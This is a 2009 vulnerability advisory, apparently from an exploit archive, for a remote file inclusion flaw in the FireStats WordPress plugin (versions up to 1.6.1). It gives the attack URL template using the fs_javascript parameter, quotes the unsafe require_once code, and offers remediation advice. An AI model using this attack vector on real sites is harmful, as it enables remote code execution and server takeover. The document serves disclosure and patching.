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HistoryJun 13, 2009 - 12:00 a.m.

WordPress Plugin FireStats <= 1.6.1(fs_javascript) RFI Vulnerability


No description provided by source.

[»]                                                                             					[»]
[»]      	  WordPress Plugin FireStats <= 1.6.1-stable (fs_javascript) RFI Vulnerability  			[»]
[»]              				         								[»]
[»]            		 	=======    ------d-------m------     ====    ====   					[»]
[»]             	 	||     =        | |(o o)| |          ||   ||   ||   					[»]
[»]             		||     =          ||(~)||            ||        ||   					[»]
[»]             	 	=======             /|\              ||        ||  					[»]
[»] 		Author         	: darkmasking		 								[»]
[»] 		Date           	: June, 13th 2009           								[»]
[»]           	Contact        	: darkmasking[at]  								[»]
[»]		Critical Level 	: Dangerous *red*			  						[»]
[»]              		       Affected software description :        						[»]
[»]   		Software 	: FireStats Version 1.6.1-stable [FireStats is a web statistics system]			[»]
[»]          	Vendor		:									[»]
[»]            	Price 	      	: $25.00 ( commercial usage )								[»]
[»]															[»]
[»] [~] RFI :														[»]
[»] 															[»]
[»][path]/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=[darkc0de]	[»]
[»]															[»]
[»]															[»]
[»] [~] Vuln : firestats-wordpress.php :Line 36										[»]
[»]															[»]
[»] 	$path = fs_get_firestats_path();										[»]
[»]	$file = $_GET['fs_javascript'];											[»]
[»]	unset($_GET['fs_javascript']);											[»]
[»]	if (strpos($file,"..") !== false) die(".. is not allowed in fs_javascript");					[»]
[»]	require_once("$path/$file");											[»]
[»]															[»]
[»]															[»]
[»] [~] Vulnerability description :											[»]
[»]															[»]
[»] 	This script is possibly vulnerable to file inclusion attacks. 							[»]
[»]															[»]
[»]	It seems that this script includes a file which name is determined using user-supplied data. 			[»]
[»]	This data is not properly validated before being passed to the include function.				[»] 
[»]															[»]
[»]															[»]
[»] [~]	How to fix this vulnerability :											[»]
[»]															[»]
[»]	Edit the source code to ensure that input is properly validated. Where is possible, 				[»]
[»]	it is recommended to make a list of accepted filenames and restrict the input to that list.			[»]
[»]															[»]
[»]	For PHP, the option allow_url_fopen would normally allow a programmer to open, 					[»]
[»]	include or otherwise use a remote file using a URL rather than a local file path. 				[»]
[»]	It is recommended to disable this option from php.ini.								[»]
[»]															[»]
[»]															[»]
[»] [~] Greetz :													[»]
[»]															[»]
[»]	Sorry bro lom ada teman jadi tuk diri sendiri aja!								[»]
[»]															[»]
[»]															[»]